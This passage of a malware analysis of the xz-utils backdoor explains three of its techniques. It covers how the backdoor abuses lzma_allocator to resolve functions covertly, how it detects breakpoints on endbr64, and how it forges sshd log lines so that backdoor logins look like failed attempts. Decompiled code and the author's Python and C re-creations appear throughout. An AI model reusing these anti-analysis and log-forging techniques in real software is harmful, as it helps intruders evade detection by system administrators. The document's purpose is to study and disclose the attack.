The third field of the lzma_allocator structure, accessed via the offset 0x10 (lzma_allocator + 0x10), is abused to pass information about the loaded ELF file to the "fake allocator" function. This field, which can be considered as the opaque field, is set to the elf_info pointer (*(undefined **)(lzma_allocator + 0x10) = elf_info;), which contains information about the parsed ELF file. This information can then be used by the "fake allocator" functions, such as Linit_pric_table_part_1 (acting as the alloc function) and Lstream_decode_1 (acting as the free function), to perform additional operations based on the loaded ELF file.

This allows the malware to hide critical function calls from static analysis tools, as these calls are not directly visible in the binary's code. Additionally, by abusing the lzma_alloc function, the malware can dynamically resolve and call imported functions without relying on traditional import resolution mechanisms, making it harder to detect and analyze the malware's behavior.

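The binary also checks whether a debugger has inserted a software breakpoint. It checks if the instruction at the given code address is still the endbr64 instruction (bytes f3 0f 1e fa, or 0xfa1e0ff3 as a little-endian integer), which normally sits at a function's entry point; a software breakpoint overwrites its first byte with int3 (0xcc), so a mismatch hints at a debugger.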

// Check if the instruction endbr64 is overwritten (software breakpoint detection)
bool breakpointcheck(int *param_1,long param_2,uint param_3)
{
  bool bVar1;
  bVar1 = false;
  if (3 < param_2 - (long)param_1) {
    bVar1 = (param_3 | 0x5e20000) + *param_1 == 0xf223;// 5E2E230
  }
  return bVar1;
}

The condition checks that the difference between param_2 and param_1 is greater than 3, which ensures there are at least 4 bytes to read, the size of the endbr64 instruction. If so, the function returns the result of the expression (param_3 | 0x5e20000) + *param_1 == 0xf223. With param_3 set to 0xe230, the constant becomes 0x5e2e230, and adding 0xfa1e0ff3 (the endbr64 instruction) wraps around in 32-bit arithmetic to exactly 0xf223. This avoids embedding the endbr64 bytes directly in the comparison.
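The arithmetic can be checked with a short Python sketch. It assumes param_3 is 0xe230 (inferred from the 5E2E230 comment in the listing) and emulates 32-bit wraparound with a mask; the function name looks_like_endbr64 is made up for this example.

```python
import struct

ENDBR64 = bytes.fromhex("f30f1efa")   # endbr64 as it appears in memory

def looks_like_endbr64(code: bytes, param_3: int = 0xE230) -> bool:
    """Re-create the obfuscated comparison from breakpointcheck()."""
    if len(code) < 4:                 # need 4 bytes, like 3 < param_2 - param_1
        return False
    (word,) = struct.unpack_from("<I", code)   # little-endian 32-bit load
    total = ((param_3 | 0x5E20000) + word) & 0xFFFFFFFF   # 32-bit wraparound
    return total == 0xF223

print(looks_like_endbr64(ENDBR64))
# A software breakpoint replaces the first byte with int3 (0xCC).
print(looks_like_endbr64(b"\xcc" + ENDBR64[1:]))
```

The intact instruction passes the check, while the patched one does not, which matches the behavior described above.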

As the attacker uses this remote code execution exploit to bypass SSH's regular authentication methods, one might assume that this activity is easily fingerprinted in the SSH connection logs. But the code appears to have a mechanism that constructs fake log entries to replace the successful connection message in an SSH server's log.

ConnectionClosedBy = ssh_consts->ConnectionClosedBy;
for (i = 0LL; i != 21; log_line[i - 1] = v26) // "Connection closed by "
   v26 = *(ConnectionClosedBy + i++);
authenticating = ssh_consts->authenticating; // "authenticating"
for (j = 0LL; j != 14; ++j)
   log_line[j + 21] = *(authenticating + j);
log_line[35] = ' ';
user_string = ssh_consts->user_string; // "user"
for (k = 0LL; k != 4; ++k)
   log_line[k + 36] = *(user_string + k);
log_line[40] = ' ';
v31 = ssh_consts->string_percent_s_key; // "%s"
log_line[41] = *v31;
LOBYTE(v31) = v31[1];
log_line[43] = ' ';
log_line[42] = v31;
v32 = ssh_consts->string_percent_s_key; // %s
log_line[44] = *v32;
LOBYTE(v32) = v32[1];
*&log_line[46] = '['; // "["
log_line[45] = v32;
string_preauth = ssh_consts->string_preauth; // "preauth"
for (m = 0LL; m != 7; ++m)
{
   LOBYTE(ConnectionClosedBy) = *(string_preauth + m);
   log_line[m + 48] = ConnectionClosedBy;
}
log_line[55] = ']'; // "]"
v19 = LODWORD(ssh_consts->field_8) == 0;
ssh_consts->started_ssh_log_hiding = 1;
if (!v19)
{
   if (runtime_functions)
   {
       v35 = runtime_functions->setlogmask;
       if (v35)
           v35(0xFFLL, string_preauth, &log_line[48], ConnectionClosedBy, v22, right_after_accept_string_1);
   }
}
result = MEMORY[0x7FEAAF6399B15]( // calls sshlogv
   ssh_consts,
   3LL,
   log_line,
   &username,
   &ip_address,
   right_after_accept_string);

The function starts by initializing several variables with values from the ssh_consts structure, which contains constants and strings used in the SSH server's logging mechanism. It then constructs a log entry string in the log_line buffer. The string starts with the text "Connection closed by" followed by the "authenticating" and "user" strings.

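It then adds two "%s" placeholders and appends the "preauth" string in square brackets. It sets the started_ssh_log_hiding flag to 1, indicating that the log hiding functionality is being used. If field_8 is non-zero and a runtime_functions structure is available, it calls setlogmask with a mask of 0xFF. Since libc's setlogmask takes a single mask argument, the extra arguments in the decompiled call are most likely decompiler artifacts rather than real parameters. Finally, the constructed string is passed as the format string to sshlogv, together with the username and IP address.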

Connection from 172.17.0.1 port 46722 on 172.17.0.2 port 22 rdomain ""
Connection closed by authenticating user root 172.17.0.1 port 46722 [preauth]

The backdoor effectively replaces the log entries that would describe a successful connection made through the backdoor with entries describing a failed connection attempt. So while you might see a spike in failed SSH connections in your logs, you can't reliably tell from them whether you were hit by this backdoor or not.
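For reference, the string assembly above can be replayed in plain C. This is a sketch under a few assumptions: the function names are mine, the store at offset 46 is treated as a two-byte " [" (the decompiled listing only shows '['), and the second placeholder is assumed to receive the "address port N" part of the line.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Rebuilds the format string piece by piece at the same offsets as the
 * decompiled code. Returns its length (56), or 0 if the buffer is too small. */
static size_t build_fake_log_format(char *buf, size_t cap)
{
    if (cap < 57)
        return 0;
    memcpy(buf + 0, "Connection closed by ", 21);
    memcpy(buf + 21, "authenticating", 14);
    buf[35] = ' ';
    memcpy(buf + 36, "user", 4);
    buf[40] = ' ';
    memcpy(buf + 41, "%s", 2);           /* first placeholder: username */
    buf[43] = ' ';
    memcpy(buf + 44, "%s", 2);           /* second placeholder: peer address */
    buf[46] = ' ';                       /* assumption: 2-byte store " [" */
    buf[47] = '[';
    memcpy(buf + 48, "preauth", 7);
    buf[55] = ']';
    buf[56] = '\0';
    return 56;
}

/* Formats the fake entry the way a printf-style logger would. */
static int render_fake_log(char *out, size_t cap,
                           const char *user, const char *peer)
{
    char fmt[64];
    if (build_fake_log_format(fmt, sizeof fmt) == 0)
        return -1;
    return snprintf(out, cap, fmt, user, peer);
}
```

Calling render_fake_log with "root" and "172.17.0.1 port 46722" reproduces the second log line shown above. Building the string from small fragments at runtime, instead of storing it whole, also means the full sentence never shows up in a strings dump of the binary.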


Q&A and Conclusions

Q : Is this a major problem? Should I burn every piece of Linux-based technology I have? Should I wake up my sysadmins at 12 am to fix this?

A : As mentioned previously, the backdoor is only built on x86-64 Linux systems as part of a Debian or RPM package build, and it only landed in bleeding-edge or unstable releases of those distros, which you SHOULD NEVER RUN IN A PRODUCTION ENVIRONMENT EVER.

Q : But can an attacker repurpose this attack? Maybe by patching the authentication mechanism?

A : This still means that they need to attack an x86-64 machine running an affected Debian- or RPM-based distribution. The RCE is not built on non-x86 machines (so M-series Macs are excluded), and it is also not built unless it's part of a Debian or RPM package build. Even if someone were able to modify the compiled exploit, it would still be too impractical to repurpose and exploit.


Q : Isn't open source development supposed to stop this type of attack? Why didn't it get caught sooner?

A : It's clear from the communications between the owner of xz-utils, Lasse Collin, and a couple of other suspicious GitHub accounts that he was pressured to make changes and cede control to Jia Tan, plus he was gaslit and bullied repeatedly. Add to that the fact that working on an open source decompression utility isn't as sexy as pushing PRs to frida or the Linux kernel, and it makes sense why this happened.

The attack was caught because someone was able to audit the code independently, without having to manually reverse engineer the full source code or anything. Something you can't do as easily in a proprietary piece of software.


Q : Why wasn't this caught by systems like EDRs, AVs, or Runtime Dependency Monitoring tools like Amazon Inspector?

A : Coverage of EDRs in Linux environments is not that good, so it's not entirely stupid to suggest that no amount of security mumbo-jumbo was able to catch this through heuristics. But many are forgetting the fact that this was deployed in unstable branches of many distros, which are not meant for production workloads and thus would probably not have security tools in place. It would be a different story if they had gotten this into Ubuntu Server or RHEL.

For what it's worth, CrowdStrike did say that they were able to detect the initial compilation of the binary through its usage of the tr command.


Are there probably more sleeper RCEs in popular Linux dependencies? I don't know. I do hope that this incident will inspire a lot of us to take a deeper look at the many dependencies we blindly trust today.

Who did it? Nobody knows exactly, but some fingers are already being pointed at several old players. The actor has gone to great lengths to make it seem like he works in China, from the UTC+8 commit times that correlate with office hours in the Mainland to the use of a Singaporean VPN node. But this seems a bit too easy to spot and is likely a misdirection strategy. For what it's worth, I do believe it's a state-sponsored attack and not some single-guy basement dweller, I just don't have the confidence (or experience) to say who exactly.

Did this take a lot more time than I had expected? Yes.